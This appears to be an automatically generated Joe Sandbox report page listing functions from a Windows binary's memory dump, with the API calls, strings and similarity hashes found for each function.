Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4e06f19d0dc66b4adbde6895fc7233b8212673a11570c6486181865d242b2650
Instruction ID: bbdcc5d9a5b5fbc8fbeb433f4ec6259c0ca51dcf2c29a609ccbd14d61298905e
Opcode Fuzzy Hash: 4e06f19d0dc66b4adbde6895fc7233b8212673a11570c6486181865d242b2650
Instruction Fuzzy Hash: 705103A0A047E53EFB3246349C05BBA7EE96B56304F0C8499F9E945CC2C3E8DE84D750

Uniqueness

Uniqueness Score: -1.00%

Function 00C21276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C212B5
GetKeyboardState.USER32(?), ref: 00C212CA
SetKeyboardState.USER32(?), ref: 00C2132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C21357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C21374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C213B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C213D9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ecf4d906e81d3f992e70984911a3cb7a547239e20304b44dbe51b9abf6a81e76
Instruction ID: 00adaed49900680facd7dd5cc2a487a07e3093a0b99e1a4bf1f095cfb5852454
Opcode Fuzzy Hash: ecf4d906e81d3f992e70984911a3cb7a547239e20304b44dbe51b9abf6a81e76
Instruction Fuzzy Hash: 335128A05047E53DFB3287249C05B7A7FAA6F16300F0C4489F9E846CD2D395EE84E760

Uniqueness

Uniqueness Score: -1.00%

Function 00C2589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C258AC
_wcsncpy.LIBCMT ref: 00C258E1
_wcsncpy.LIBCMT ref: 00C25913
_wcsncpy.LIBCMT ref: 00C25946
_wcsncpy.LIBCMT ref: 00C25988
_wcsncpy.LIBCMT ref: 00C259C2
_wcsncpy.LIBCMT ref: 00C259F1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: e8029f101d7ba199a681b6324f908d755495972da45e46a700a2f828e48e49a8
Instruction ID: da3af9a1a4277337179cd374ca2a97ea851d2e800f9489cf988fe2d37be9d9be
Opcode Fuzzy Hash: e8029f101d7ba199a681b6324f908d755495972da45e46a700a2f828e48e49a8
Instruction Fuzzy Hash: 8341A3A5C20568B6CB11FBB5988B9CFB3EC9F04710F5085A6F518E3121E734E715C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C4A2C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

@U=u, xrefs: 00C4A3BE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: fbbaa3369b8583df53e416580a25a49aa82736f2f4dbdc8c64c5eb68ef1788bf
Instruction ID: 7350effc16dda9cfef3e2f1f5340b972a916871b9a7706abff729c12af84ea90
Opcode Fuzzy Hash: fbbaa3369b8583df53e416580a25a49aa82736f2f4dbdc8c64c5eb68ef1788bf
Instruction Fuzzy Hash: 5B41C179D80214AFD720DF28CC48FA9BBA4FB09320F154169F969A72F1E770EE41DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00C238AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C238D3,?), ref: 00C248C7

Part of subcall function 00C248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C238D3,?), ref: 00C248E0

lstrcmpiW.KERNEL32(?,?), ref: 00C238F3
_wcscmp.LIBCMT ref: 00C2390F
MoveFileW.KERNEL32(?,?), ref: 00C23927
_wcscat.LIBCMT ref: 00C2396F
SHFileOperationW.SHELL32(?), ref: 00C239DB

Strings

\*.*, xrefs: 00C23969

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: e6bf2cb365713b0953e395470651c46c0815246ec775527488faa2e0873e19b7
Instruction ID: d74337875bd1d8d59ada618a10d6cd0a5e1daa828244215775d245f528794927
Opcode Fuzzy Hash: e6bf2cb365713b0953e395470651c46c0815246ec775527488faa2e0873e19b7
Instruction Fuzzy Hash: E041B1715083949EC751EF64D481AEFB7ECAF8A340F04092EB499C3551EB78D788CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C47500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C47519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C475C0
IsMenu.USER32(?), ref: 00C475D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C47620
DrawMenuBar.USER32 ref: 00C47633

Strings

0, xrefs: 00C4750D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 2afa554fd5148f3a516e3e20f01cb0f5bf04a467e5cad1f821ced82a016d67f1
Instruction ID: b1aec7e2fb0282639ce3ba932bac56bd27ca028155903331a058b0550c2788b3
Opcode Fuzzy Hash: 2afa554fd5148f3a516e3e20f01cb0f5bf04a467e5cad1f821ced82a016d67f1
Instruction Fuzzy Hash: 05412975A04609EFDB10DF54D884EDABBF9FB05314F058269F9259B290D730AE50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C4122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C4125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C41286
FreeLibrary.KERNEL32(00000000), ref: 00C4133D

Part of subcall function 00C4122D: RegCloseKey.ADVAPI32(?), ref: 00C412A3
Part of subcall function 00C4122D: FreeLibrary.KERNEL32(?), ref: 00C412F5
Part of subcall function 00C4122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C41318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C412E0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 42326349c6b911a8e5ab392446fac0ec6f67b8bc192aa0e50457f4ba6773724e
Instruction ID: a4303b5d353251d7c8b78405069537a86b3ab3f04ed686ebcb3666991187c556
Opcode Fuzzy Hash: 42326349c6b911a8e5ab392446fac0ec6f67b8bc192aa0e50457f4ba6773724e
Instruction Fuzzy Hash: FD3109B5901119BFDB159F90DC89EFEB7BCFF09300F04016AE952E2151EA749F859AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C380CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C364D9
WSAGetLastError.WSOCK32(00000000), ref: 00C364E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C36521
connect.WSOCK32(00000000,?,00000010), ref: 00C3652A
WSAGetLastError.WSOCK32 ref: 00C36534
closesocket.WSOCK32(00000000), ref: 00C3655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C36576

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: c1b458ff49d51e7f3cd6858a4d62a56f6decb45502f98961bfc3dfb21154dde3
Instruction ID: c4fc07c60d9a72f458af58e343f040e9287f53c704155ae29423300d35e4d5c5
Opcode Fuzzy Hash: c1b458ff49d51e7f3cd6858a4d62a56f6decb45502f98961bfc3dfb21154dde3
Instruction Fuzzy Hash: 0E31B135610218AFEB10AF24DC89FBE7BB8EB45714F00806DF9199B291DB74AD05DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C19372 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C193F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C19409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C19439

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Strings

ListBox, xrefs: 00C193B5
ComboBox, xrefs: 00C19380
@U=u, xrefs: 00C193F6, 00C19409, 00C19439

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: @U=u$ComboBox$ListBox
API String ID: 365058703-2258501812
Opcode ID: f262ea12a08e321f11b70d413651ef8f8ef159a8f7bcdc0f138cb065a706d0ef
Instruction ID: 7bb9a680804733643f22674ae7691c0fa544cb2d1781d571d77f36110b676cfe
Opcode Fuzzy Hash: f262ea12a08e321f11b70d413651ef8f8ef159a8f7bcdc0f138cb065a706d0ef
Instruction Fuzzy Hash: BB21F2B1940108BBDB14AB71DC95EFEB7B8DF06350B10416DF826971E0DB341E8AAA10

Uniqueness

Uniqueness Score: -1.00%

Function 00C1E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1E120
SysAllocString.OLEAUT32(00000000), ref: 00C1E123
SysAllocString.OLEAUT32 ref: 00C1E144
SysFreeString.OLEAUT32 ref: 00C1E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00C1E167
SysAllocString.OLEAUT32(?), ref: 00C1E175

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 924c712fca1d0640df6a3ea9422c6385e4adb2eaf55fc8dff512e82f6896df43
Instruction ID: e1dd8fdba3817d3f1c137153f05088434ed44e0cef3b853d6e892d86d5820b45
Opcode Fuzzy Hash: 924c712fca1d0640df6a3ea9422c6385e4adb2eaf55fc8dff512e82f6896df43
Instruction Fuzzy Hash: 02214436604108BF9B109FA9DC88EAF77ECFB0A760B508125FD15CB261DA70DD819B64

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B6AF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C1B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C1B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C1B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C1B742
_wcsstr.LIBCMT ref: 00C1B74C

Strings

@U=u, xrefs: 00C1B6E4, 00C1B71C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID: @U=u
API String ID: 3902887630-2594219639
Opcode ID: f399914130fcecb49e48f55fc2717cebf20c7c4e1574a5b29eaee6a64ea12443
Instruction ID: 06df86f9751a04a22a40fd085d7bfe4e238b28cbfbbac7771c1b3348e9e5046a
Opcode Fuzzy Hash: f399914130fcecb49e48f55fc2717cebf20c7c4e1574a5b29eaee6a64ea12443
Instruction Fuzzy Hash: B721DA35604244BAEB255B3A9C49FBF7BE8DF46750F10407DF805CA1A1EB61DD81A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C197E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C19802

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19834
__itow.LIBCMT ref: 00C1984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19874
__itow.LIBCMT ref: 00C19885

Strings

@U=u, xrefs: 00C19802, 00C19834, 00C19874

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID: @U=u
API String ID: 2983881199-2594219639
Opcode ID: b7f2e73dc12e0de20be8e9342a5e22dc8ecb07a35e85024c8a52006c2022ce7d
Instruction ID: edbc5481add60aa16a061edeb543f5fa232902ea630c92b5825071e83db5ab07
Opcode Fuzzy Hash: b7f2e73dc12e0de20be8e9342a5e22dc8ecb07a35e85024c8a52006c2022ce7d
Instruction Fuzzy Hash: 4F21CB71701208BBEB10AA658C86FEE7BE9EF4BB10F044079F905D7291D6708D81E791

Uniqueness

Uniqueness Score: -1.00%

Function 00C4783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C478A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C478AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C478B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C478C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C478D4

Strings

Msctls_Progress32, xrefs: 00C47872

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 920c32486a15d59cdecc36101a26a59e360dba5feb2a3b775d0c4d27fd0b506e
Instruction ID: ae2b037ae33449cae248b157d2a659f47615cab97ab02e49a02bf2da01f4fea3
Opcode Fuzzy Hash: 920c32486a15d59cdecc36101a26a59e360dba5feb2a3b775d0c4d27fd0b506e
Instruction Fuzzy Hash: BC1163B1550219BFEF159F64CC85EEB7F6DFF08758F014115BA14A6090C7719C21DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BE41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00BE4292,?), ref: 00BE41E3
GetProcAddress.KERNEL32(00000000), ref: 00BE41EA
EncodePointer.KERNEL32(00000000), ref: 00BE41F6
DecodePointer.KERNEL32(00000001,00BE4292,?), ref: 00BE4213

Strings

RoInitialize, xrefs: 00BE41D2
combase.dll, xrefs: 00BE41DE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: cdbd2f6331c3c1af850bd5f3800a191ddd6b8b433cae1d1eb61933fcf9ee3527
Instruction ID: b914cdecc463dbc66b41f49a8d96bf412f1bc26ea2f293a9530a55b1bd0b0ee6
Opcode Fuzzy Hash: cdbd2f6331c3c1af850bd5f3800a191ddd6b8b433cae1d1eb61933fcf9ee3527
Instruction Fuzzy Hash: 8EE0E5B8A90341AAEF205FB1EC0DB0C3AE4BB22B43F504438B911E50A0DBB544969B08

Uniqueness

Uniqueness Score: -1.00%

Function 00BE429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BE41B8), ref: 00BE42B8
GetProcAddress.KERNEL32(00000000), ref: 00BE42BF
EncodePointer.KERNEL32(00000000), ref: 00BE42CA
DecodePointer.KERNEL32(00BE41B8), ref: 00BE42E5

Strings

RoUninitialize, xrefs: 00BE42A7
combase.dll, xrefs: 00BE42B3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: c82c35ab86801caed73de077c9663a3ebda85a398325196d034a0797eb3f6164
Instruction ID: 49cb7ff82b90a887de69dc90ce97a475eb4b90ad498be3f00cb2c7b62568b6d4
Opcode Fuzzy Hash: c82c35ab86801caed73de077c9663a3ebda85a398325196d034a0797eb3f6164
Instruction Fuzzy Hash: ADE0BD7CA91302ABEB249F61ED0DF0D3AE4BB26B46F104028F501E10B0DBB48589CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00C2675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C268AD
_memmove.LIBCMT ref: 00C267E8

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

_memmove.LIBCMT ref: 00C2685B
_memmove.LIBCMT ref: 00C26942
_memmove.LIBCMT ref: 00C2695B
_memmove.LIBCMT ref: 00C26977

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
Instruction ID: cad019ec85f455498dd96812d97163f613ed1cc43e3dc35701207dfc0ba23daa
Opcode Fuzzy Hash: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
Instruction Fuzzy Hash: C261CE305002AAABDF11EF25DC85FFE37A4AF04708F044599F86A5B292DF34AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

